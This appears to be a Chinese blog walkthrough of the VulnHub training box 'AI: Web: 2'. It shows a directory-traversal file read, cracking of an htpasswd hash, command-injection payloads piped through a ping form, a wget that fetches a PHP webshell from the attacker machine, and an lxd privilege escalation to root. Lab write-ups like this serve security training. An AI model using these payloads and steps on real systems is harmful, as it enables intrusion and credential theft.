标签：文件读取、爆破、命令注入、敏感文件泄露、lxd提权

0x00 环境准备

下载地址：https://www.vulnhub.com/entry/ai-web-2,357/
flag数量：1
攻击机：kali
攻击机地址：192.168.5.3
靶机描述：

Difficulty: Intermediate
Network: DHCP (Automatically assign)
Network Mode: NAT
This is the second box from the series AI: Web and you will have more fun to crack this challenge. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root.

You may need to crack password. Use wordlist SecLists/rockyou-45.txt by Mr. Daniel Miessler.

For any hint please tweet on @arif_xpress

0x01信息搜集

1.探测靶机地址

命令：arp-scan -l

靶机地址是192.168.5.4

2.探测靶机开放端口

命令：nmap -sV -p- 192.168.5.4

开放了22端口和80端口，先看一下80端口

不是CMS。尝试sql注入，不存在sql注入。

3.目录扫描

那就扫描一下目录吧，命令：dirb http://192.168.5.4

其中有个wenadmin的文件，访问看一下

是个登录页面，尝试几个弱口令，不行。
那就看看其他功能吧。

0x02 文件读取

看到有个注册的按钮，那就先注册一个账户试试。

注册后去登录

登录后是这个页面，这里有个Welcome to XuezhuLi FileSharing标语，去搜索引擎查一下xuezhuli filesharing

发现这是一个github上的项目，2016年的项目，项目链接：https://github.com/XuezhuLi/FileSharing
查一下有没有漏洞

找到了两个漏洞，第一个漏洞是CSRF，危害不大，也不好利用；第二个是文件遍历，这个可以读取一些文件，用这个。漏洞利用链接：https://www.exploit-db.com/exploits/40009

使用burp抓包利用一下

利用成功，读取到了/etc/passwd文件，刚才从插件上得知这是个apache的系统，刚才还找到了登录页面，apache系统一般会有一个认证文件，里面保存着账号密码。既然现在可以读取文件，那就读取一下apache的认证文件。

爆破出了apache的认证文件，目录：/etc/apache2/.htpasswd
账号密码：aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
账号是aiweb2admin，密码被加密了，使用john解密一下。

0x03 john爆破

提示中说用rockyou字典，将上面的账号密码保存一下，然后爆破。命令：john --wordlist=/usr/share/wordlists/rockyou.txt aiweb2.txt

爆破出来了，账号密码：aiweb2admin \ c.ronaldo

0x04 命令注入

在http://192.168.5.4/webadmin/下发现了robots.txt文件

访问http://192.168.5.4/webadmin/H05Tpin9555/发现是一个执行ping命令的页面

使用burp抓包尝试绕过，执行其他命令。发现使用“|”可以绕过

尝试反弹shell，但是不成功。
使用wget下载一句话试试，在kali上创建一句话文件，为了保险，我既写了一句话，又写了反弹shell：

然后建立一个临时服务器，命令：python -m SimpleHTTPServer

使用wget下载shell.php，命令：wget http://192.168.5.3:8000/shell.php

访问一下看看，没有报404，应该是下载成功了，验证一句话：

一句话可以执行，连菜刀，报错了

我上网查了一下401错误：

如果这种通过浏览器的检查表明没有授权问题，则可能是您的 Web 服务器 ( 或周边系统 ) 被设置为不允许某种 HTTP 传输模式。 换句话说就是， 来自一个知名浏览器的 HTTP 通讯是允许的， 但来自其他系统的自动通讯则被拒绝， 并生成 401 错误代码。这是一种异常情况， 但是也许表明您的 Web 服务器周围 采取了非常具有防御性的安全策略。

这样看来不能用菜刀这类的网站管理工具了，换个其他的思路吧。
401错误解决方法：basic认证

0x05 密码文件——得来全不费工夫

既然不能使用一句话，那就看一下当前目录有什么文件吧
命令：ip=127.0.0.1|pwd&Submit=Submit
回显：

/var/www/html/webadmin/H05Tpin9555

命令：ip=127.0.0.1|ls&Submit=Submit
回显：

index.php
shell.php
style-main.css

没什么可利用的，看看上一级webadmin目录下有什么

命令：ip=127.0.0.1|ls /var/www/html/webadmin&Submit=Submit
回显：

H05Tpin9555
S0mextras
index.html
robots.txt

访问http://192.168.5.4/webadmin/S0mextras/看看

提示发现了juicy的信息，查看一下这个目录下有什么文件

命令：ip=127.0.0.1|ls /var/www/html/webadmin/S0mextras&Submit=Submit
回显：

index.htm

只有一个文件，这跟提示不符啊，应该是有隐藏文件

命令：ip=127.0.0.1|ls -la /var/www/html/webadmin/S0mextras&Submit=Submit
回显：

/var/www/html/webadmin/S0mextras:
index.html

可能是无法使用-la参数，用find命令试一下

命令：ip=127.0.0.1|find . -type f /var/www/html/webadmin/S0mextras&Submit=Submit
回显：

./style-main.css
./index.php
./shell.php
/var/www/html/webadmin/S0mextras
/var/www/html/webadmin/S0mextras/.sshUserCred55512.txt
/var/www/html/webadmin/S0mextras/index.html

这下发现了隐藏文件，.sshUserCred55512.txt文件从文件名上来看应该是和ssh登录有关，用cat命令查看一下。

命令：ip=127.0.0.1|cat /var/www/html/webadmin/S0mextras/.sshUserCred55512.txt&Submit=Submit
回显：

User: n0nr00tuser
Cred: zxowieoi4sdsadpEClDws1sf

0x06 提权

拿到了账号密码，使用ssh登录一下。命令：ssh n0nr00tuser@192.168.5.4

登录成功
命令：sudo -l

不能使用sudo
那就使用LinEnum工具扫描一下可以利用哪些信息提权。
创建一个临时服务器，然后靶机切换到/tmp目录下，wget下载LinEnum.sh文件

然后给文件赋权，执行文件，由于输出信息比较多，这里使用-r参数指定将输出信息输出到report.txt文件中。命令：./LinEnum.sh -r report.txt

在文件的最后发现可以利用lxd漏洞

找一下lxd的漏洞，命令：searchsploit lxd

把它复制过来

使用vi命令打开，然后输入:set ff=unix，然后输入:wq回车保存退出。如果不设置ff=unix会报错。

cat 46978.sh发现，运行脚本的时候还需要一个文件，文件地址https://github.com/saghul/lxd-alpine-builder
将文件下载到kali上，然后给权限运行

运行后它会下载一个tar.gz的文件，我下载用了很长时间，而且并不是一次就下载成功了，我下载了三次才成功，下载成功的截图

下载成功后会出现一个tar.gz文件，这个文件是以时间戳命名的

在kali上创建临时服务器，将需要用到的两个文件下载到靶机上（由于kali换了新的镜像，现在的kali地址是192.168.5.9）

在靶机上切换到/tmp目录，下载两个文件

给46978.sh文件可执行权限，然后运行

已经是root权限了，flag.txt文件在/mnt/root/root下

0x07 小结

从文件读取漏洞开始，读取到apach的配置文件，拿到账号密码，在进入网站后台后，又发现了命令注入漏洞，通过这个漏洞又找到了ssh的账号密码文件，登录ssh后开始提权。首先使用LinEnum.sh文件扫描漏洞，发现了lxd漏洞。整体的难点或者说麻烦的地方在于运行build-alpine文件，这个地方浪费了很多时间。

由于我不会每天都登录简书，所以有什么私信或者评论我都不能及时回复，如果想要联系我最好给我发邮件，邮箱：Z2djMjUxMTBAMTYzLmNvbQ==，如果发邮件请备注“简书”

参考链接：

1.http 401错误解析
2.Basic认证
3.AI: Web: 2靶机-Walkthrough
4.AI: WEB: 2 VULNHUB WALKTHROUGH